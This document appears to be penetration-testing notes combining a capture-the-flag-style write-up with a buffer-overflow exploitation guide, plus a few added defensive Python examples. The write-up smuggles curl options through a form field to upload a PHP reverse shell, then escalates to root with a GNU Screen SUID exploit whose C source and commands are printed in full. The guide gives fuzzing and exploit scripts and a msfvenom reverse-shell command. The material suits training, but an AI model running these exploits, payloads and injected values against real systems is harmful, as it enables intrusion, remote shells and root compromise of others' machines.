Following the suggestion of the text in the error message, I modify the formurl field in Repeater, replacing '\&id' with '--help'. The response from the server includes the curl help menu (command execution).
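The exposed.php backend is not shown in these notes, so here is the same failure mode reproduced in Python as an added example (not the box's code): when the form value is dropped into a curl command line, whitespace splits it into extra arguments and values such as `--help` or `-o` are parsed as curl options; the hardened builder validates the value as one absolute http(s) URL and passes it after `--`. The form values below are constructed, and the block only builds the argument lists so it runs offline.

```python
import shlex
from urllib.parse import urlsplit


def argv_via_shell(formurl):
    """Vulnerable pattern: the value is pasted into a shell command string, so
    the shell splits it into separate curl arguments (mimicked with shlex)."""
    return ["curl"] + shlex.split(formurl)


def argv_single_arg(formurl):
    """Better but still flawed: one argv element and no shell, yet a value that
    starts with '-' (for example '--help') is still parsed by curl as an option."""
    return ["curl", formurl]


def injected_options(argv):
    """Arguments that curl would treat as options rather than as a URL."""
    return [arg for arg in argv[1:] if arg.startswith("-")]


def argv_hardened(formurl, allowed_schemes=("http", "https")):
    """Validate the value as a single http(s) URL and place it after '--', so
    nothing the user supplies can be interpreted as a curl option."""
    url = formurl.strip()
    if any(ch.isspace() for ch in url):
        raise ValueError("URL must not contain whitespace")
    parts = urlsplit(url)
    if parts.scheme not in allowed_schemes or not parts.hostname:
        raise ValueError("only absolute http(s) URLs are accepted")
    return ["curl", "--", url]
```

Any of the returned lists can be handed to `subprocess.run(argv)`; only the hardened one is safe to run with user-controlled input.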
### Establishing a foothold

Now that we understand how the command works, we can attempt to upload files to the server using curl. Our previous enumeration identified the existence of an ‘/uploads’ directory, which we can target as our upload destination. Nmap also identified that this is a Linux box, so we’ll first attempt to upload an image to the server, then test to determine if the upload was successful.

To upload files we first create a SimpleHTTPServer on the attacking machine, then use Burp Suite to attempt to retrieve the file by modifying the POST command. We can also specify within the POST command to attempt to save the file in the location where we suspect the 'uploads' directory resides: '/var/www/html/uploads/'.

```
formurl = http://10.10.14.18/cat.jpg -o /var/www/uploads/cat.jpg
```

The web server response does not include an error, but we can confirm the upload was successful by navigating to 'uploads/cat.jpg'.

Next, we attempt to upload a reverse shell. Since we know that the server is already using PHP, we’ll first attempt a PHP reverse shell. I modify a basic PHP reverse shell with the IP address of my attacking machine and upload it using Burp Suite. I then set up a netcat listener and navigate to the newly uploaded shell via the browser. Success!

The user flag is located at /home/maria/Desktop.

### Privilege escalation

Before escalating our privileges we need to upgrade to an interactive shell. Enumeration reveals that this machine includes Python3, but not Python2. Therefore we spawn a TTY shell using:

```bash
python3 -c "import pty; pty.spawn('/bin/bash')"
```

We then background the shell using `Ctrl + Z`, enter the command `stty raw -echo`, and foreground our shell using `fg`. We now have an interactive TTY shell with tab autocompletion.
Next we move on to some basic enumeration to identify privilege escalation possibilities. My methodology typically includes reviewing user and system information, checking for installed binaries, and checking SUID files. If nothing stands out I move on to uploading scripts such as LinPeas.sh to assist with further enumeration. On this machine, however, the basic enumeration was sufficient and we identify an interesting binary with the SUID bit set.

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-15.png)

A Google search reveals an exploit is available for this version: [https://www.exploit-db.com/exploits/41154](https://www.exploit-db.com/exploits/41154)

This exploit includes a bash script, so we can easily download the file to our attacking machine, make any necessary modification(s), and upload it to our target. However, our first attempt at running the exploit fails to compile the embedded C binaries because of missing dependencies. The easiest method for resolving this issue is to remove the code for the creation of the two binaries, and instead create/compile them on your attacking machine and transfer them to the target.

From the original script, copy the code below and save it to your attacking machine as libhax.c.

```c
/* Header names were lost in extraction; the standard ones for chown/chmod/unlink/printf are restored. */
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
```

Compile the binary using the suggested command.

```bash
gcc -fPIC -shared -ldl -o libhax.so libhax.c
```

For the second script we extract the code below, saving it on our attacking machine as rootshell.c.
```c
/* Header names were lost in extraction; stdio.h and unistd.h are restored.
   execvp() takes (file, argv), so the original three-argument call is corrected. */
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", (char *[]){"/bin/sh", NULL});
}
```

Finally, we compile the second script using the included command.

```bash
gcc -o rootshell rootshell.c
```

Next, we transfer both binaries to the /tmp directory on the target machine using wget.

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-16.png)

Finally, we execute the remaining commands from the exploit script (one at a time).

```bash
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
```

Success!

![](https://oncyberwar.com/wp-content/uploads/2021/01/image-17.png)

The root flag is located in the /root directory.
--------------------------------------------------------------------------------
/4.-exploitation/buffer-overflows.md:
--------------------------------------------------------------------------------
# Buffer overflows

These instructions are a combination of my notes from the PWK course material and notes taken while executing Tib3rius's ["Buffer Overflow Prep"](https://tryhackme.com/room/bufferoverflowprep) room on THM. There are multiple techniques for executing buffer overflows, but all follow the same basic outline. Find what works for you.

## General information

Almost all buffer overflow exploits follow a common general flow.
* Create a large buffer to trigger the memory overflow
* Control EIP by overwriting a return address on the stack by padding a large buffer with an appropriate offset
* Include a chosen payload in the buffer prepended by a NOP sled
* Choose a correct return address instruction such as JMP ESP in order to redirect the execution flow into the chosen payload

#### Important memory locations

* EAX, EBX, EDX, ESI and EDI are often used as general purpose registers for temporary data storage
  * EAX (accumulator) - arithmetic and logical functions
  * EBX (base) - base pointer for memory addresses
  * ECX (counter) - loop, shift, and rotation counter
  * EDX (data) - I/O port addressing, multiplication and division
  * ESI (source index) - pointer addressing of data and source in string copy operations
  * EDI (destination index) - pointer addressing of data and destination in string copy operations
* ESP is the stack pointer and keeps track of the most recently referenced location by storing a pointer
* EBP is the base pointer and stores a pointer to the top of the stack when a function is called
* EIP is the instruction pointer and always points to the next code instruction to be executed

{% hint style="info" %}
EIP is the primary target during a buffer overflow because it controls program flow!
{% endhint %}

## Setup

### Immunity Debugger

1. Start the application first, then open Immunity Debugger and use File --> Attach to view the applicable process -OR-
2. Open Immunity Debugger and use File --> Open to start the application
3. Select the "red arrow" to run the application

#### Basic commands

* F2 - set breakpoint
* F7 - Step into a function
* F8 - Step over a function
* F9 - Run

### Mona.py

1. Set up your working folder with the following command:

```
!mona config -set workingfolder c:\mona\%p
```

Mona is available at: [https://github.com/corelan/mona](https://github.com/corelan/mona)

## Fuzzing

The following script will fuzz a program by sending a string of characters that increases by 100 bytes with each iteration. To use, update the IP address, port, and string (line 20) to match the program you are testing. The script is written for Python 2; under Python 3 the strings sent over the socket would need to be bytes.

```python
import socket, time, sys

ip = "10.0.0.1" #change
port = 21 #change
timeout = 5

# Create an array of increasing length buffer strings.
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        s.send("USER username\r\n") #update
        s.recv(1024)

        print("Fuzzing PASS with %s bytes" % len(string))
        s.send("PASS " + string + "\r\n")
        s.recv(1024)
        s.send("QUIT\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
```

## Replicate the crash

Build a script to replicate the error caused by the fuzzing script.
```python
import socket

ip = "10.0.0.1" #update
port = 21 #update

prefix = ""
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")
```

### Locate EIP

Generate a string of characters 400 bytes longer than the length that caused the program to crash while fuzzing.

```bash
msf-pattern_create -l 2700
```

* Insert the generated pattern into the "payload" variable of your script
* Restart Immunity Debugger and the program you are testing
* Run the exploit script
* Note the characters that overwrite EIP
* Use pattern\_offset.rb to locate the position of the characters in the string

```bash
msf-pattern_offset -q 39694438
```

* Add the value from pattern\_offset to the "offset" variable in the script
* Set the script's "retn" variable to "BBBB"
* Restart Immunity Debugger and the program you are testing
* Run the exploit script
* EIP should be cleanly overwritten with Bs (42424242)

### Check for bad characters

1. Insert the bad character buffer into the script's "payload" variable
2. Restart Immunity Debugger and the program you are testing
3. Run the exploit script
4. After the program crashes, right click on "ESP" and "Follow Dump"
5. Remove characters that cause errors in memory (non-sequential)
6. Repeat steps 2-5 until there are no errors remaining in ESP

{% hint style="info" %}
\x00 was already removed from this buffer.
{% endhint %}

```python
# Bad Characters
payload = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
```

## Redirect execution

Next, we want to find a reliable location in memory that contains a JMP ESP (or similar) instruction. This will enable us to redirect the program to our payload at the time of the crash.

1. Use the mona jmp command to search for jmp (or equivalent). By default, jmp ignores modules with DEP or ASLR.
2. Select from the list of options and note the memory location
3. Reverse the location (little endian) and insert the value in the script's "retn" variable (625011af becomes "\xaf\x11\x50\x62")

```
!mona jmp -r esp -cpb "\x00\x0a\x0d" # update bad characters

# mona find can also be used here, but jmp normally works
!mona find -s 'jmp esp' -type instr -cm aslr=false,rebase=false,nx=false -cpb "\x00\x0a\x0d"
```

## Generate payload

Next, we generate our reverse shell payload and add it to the exploit. We'll also pad the beginning of the payload with a minimum of 16 NOPs (\x90) to provide space in memory for decoding the payload.

### Generate shellcode with Metasploit

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f py
```

### Pad with NOPs

Add the following to the script's "padding" variable.

```python
"\x90" * 16
```

## Launch exploit

* Set up a netcat listener on the attacking machine using the same port identified during the generation of the payload
* Launch the exploit
--------------------------------------------------------------------------------
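Why the mona `jmp` step in the Redirect execution section can skip modules: DEP and ASLR are per-module opt-in bits in the DllCharacteristics field of the PE optional header, and mona's `aslr`/`nx`/`rebase` filters read exactly those. As an added example that is not part of these notes, the Python below reads the flags from a header-only PE image it constructs itself; the same `module_mitigations` function, given the bytes of a real DLL from disk, lets a defender confirm a build ships with both mitigations (the one case where a static JMP ESP address cannot be relied on).

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits (PE optional header, offset 70 for PE32 and PE32+).
DLL_FLAGS = {
    "HIGH_ENTROPY_VA": 0x0020,
    "DYNAMIC_BASE": 0x0040,  # ASLR opt-in
    "NX_COMPAT": 0x0100,     # DEP opt-in
    "NO_SEH": 0x0400,
    "GUARD_CF": 0x4000,
}
IMAGE_FILE_RELOCS_STRIPPED = 0x0001  # COFF Characteristics bit: module cannot be rebased


def module_mitigations(image):
    """Return the mitigation flags of a PE image supplied as bytes."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                      # 20-byte COFF file header
    (coff_chars,) = struct.unpack_from("<H", image, coff + 18)
    opt = coff + 20                          # optional header starts with Magic
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):          # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (dll_chars,) = struct.unpack_from("<H", image, opt + 70)
    flags = {name: bool(dll_chars & bit) for name, bit in DLL_FLAGS.items()}
    flags["RELOCS_PRESENT"] = not (coff_chars & IMAGE_FILE_RELOCS_STRIPPED)
    flags["PE32PLUS"] = magic == 0x20B
    return flags


def is_hardened(flags):
    """Both ASLR and DEP opted in. A module missing either loads at a fixed
    base or with an executable stack, which is why mona's default filters
    treat it as a candidate rather than skipping it."""
    return flags["DYNAMIC_BASE"] and flags["NX_COMPAT"]


def build_minimal_pe(dll_chars, coff_chars=0, pe32plus=False):
    """Construct a header-only PE image (no sections) for the demonstration."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)    # e_lfanew: PE header follows the DOS header
    opt_size = 112 if pe32plus else 96
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                       0, 0, 0, 0, opt_size, coff_chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def report(image):
    """One-line summary suitable for looping over a directory of modules."""
    flags = module_mitigations(image)
    enabled = [name for name in DLL_FLAGS if flags[name]]
    verdict = "hardened" if is_hardened(flags) else "NOT hardened"
    return "%s: %s" % (verdict, ", ".join(enabled) or "none")
```

For a real module use `report(open(path, "rb").read())`; the flags it prints are the ones mona summarises as ASLR, NXCompat and Rebase in its module table.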